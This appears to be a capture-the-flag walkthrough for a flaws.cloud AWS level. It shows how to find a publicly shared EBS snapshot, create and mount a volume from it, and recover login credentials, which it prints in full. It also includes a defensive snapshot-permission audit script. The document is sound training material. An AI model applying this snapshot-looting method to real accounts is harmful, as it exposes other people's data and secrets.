According to the description, there is an EC2 instance hosting the page at the following link, and they mention that a snapshot of that EC2 instance was taken:

4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

Since there was a snapshot of the EC2 instance, we should first check which IAM user our flaws profile is linked to. Use the following command:

aws --profile flaws sts get-caller-identity
# This command is often used to verify which AWS credentials are currently being used

We know that there is an account “backup” with account ID 975426262029 that was taking snapshots of the EC2 instance. List the snapshots owned by that account:

aws --profile flaws ec2 describe-snapshots --owner-id 975426262029

By default, snapshots are private, and you can transfer them between accounts securely by specifying the account ID of the other account, but it seems a number of people just make them public and forget about them.
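Added example (not part of the original walkthrough): the owner's side of this point, as a small audit that classifies snapshots by their createVolumePermission and builds the `aws ec2 modify-snapshot-attribute` command that would remove an unwanted share. The snapshot IDs, account IDs and the trusted-account set are constructed sample values; the input mirrors the JSON returned by `aws ec2 describe-snapshot-attribute --attribute createVolumePermission`.

```python
import json

# Constructed sample: one describe-snapshot-attribute response per snapshot.
SAMPLE_RESPONSES = json.loads("""
[
  {"SnapshotId": "snap-0aaaaaaaaaaaaaaa1", "CreateVolumePermissions": [{"Group": "all"}]},
  {"SnapshotId": "snap-0aaaaaaaaaaaaaaa2", "CreateVolumePermissions": [{"UserId": "111111111111"}]},
  {"SnapshotId": "snap-0aaaaaaaaaaaaaaa3",
   "CreateVolumePermissions": [{"UserId": "222222222222"}, {"UserId": "111111111111"}]},
  {"SnapshotId": "snap-0aaaaaaaaaaaaaaa4", "CreateVolumePermissions": []}
]
""")

def classify(response, trusted_accounts):
    """Return (snapshot_id, status, detail) for one response.

    'public'          -> Group=all, any AWS account can create a volume from it
    'untrusted-share' -> shared with an account ID outside trusted_accounts
    'trusted-share'   -> shared only with accounts in trusted_accounts
    'private'         -> no createVolumePermission entries (the default)
    """
    snap = response["SnapshotId"]
    perms = response.get("CreateVolumePermissions", [])
    if any(p.get("Group") == "all" for p in perms):
        return snap, "public", ["all"]
    accounts = sorted(p["UserId"] for p in perms if "UserId" in p)
    unknown = [a for a in accounts if a not in trusted_accounts]
    if unknown:
        return snap, "untrusted-share", unknown
    return snap, ("trusted-share" if accounts else "private"), accounts

def remediation(snap, status, detail):
    """Build the CLI command that removes the flagged permission."""
    base = (f"aws ec2 modify-snapshot-attribute --snapshot-id {snap} "
            "--attribute createVolumePermission --operation-type remove ")
    if status == "public":
        return base + "--group-names all"
    return base + "--user-ids " + " ".join(detail)

def audit(responses, trusted_accounts):
    """Return only the snapshots that are public or shared outside the allowlist."""
    findings = [classify(r, trusted_accounts) for r in responses]
    return [f for f in findings if f[1] in ("public", "untrusted-share")]

if __name__ == "__main__":
    for finding in audit(SAMPLE_RESPONSES, {"111111111111"}):
        print(finding[0], finding[1], "->", remediation(*finding))
```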

Because snapshots can be shared, we can create a volume from this snapshot in our own account:

aws --profile default ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

We create an Ubuntu instance and mount the volume on that instance:

  1. Create the instance in the same region as the volume.
  2. Once the instance is created, go to Volumes and attach the volume created from the snapshot to the instance.
  3. While attaching, note the device name so that it is easy to find when you mount it in your Ubuntu instance. I chose /dev/xvdbd.
  4. Once the volume is attached, SSH into your instance and mount the volume as follows:

lsblk

The snapshot volume is available as /dev/xvdbd1.

sudo file -s /dev/xvdbd1
# This command asks Linux to identify the type of filesystem or data present on the block device /dev/xvdbd1. It can return results such as "ext4 filesystem", "swap", or "data", depending on the actual content.

To mount the volume on your instance, use:

sudo mount /dev/xvdbd1 /mnt

Once the volume is mounted, go to /mnt/ and look for any secrets you can find, since we want to log in to the website at http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/

As you can see, there is a setupNginx.sh in the ubuntu home directory of the mounted snapshot.

We have:

username - flaws

password - nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Using these creds, we can log in to the website: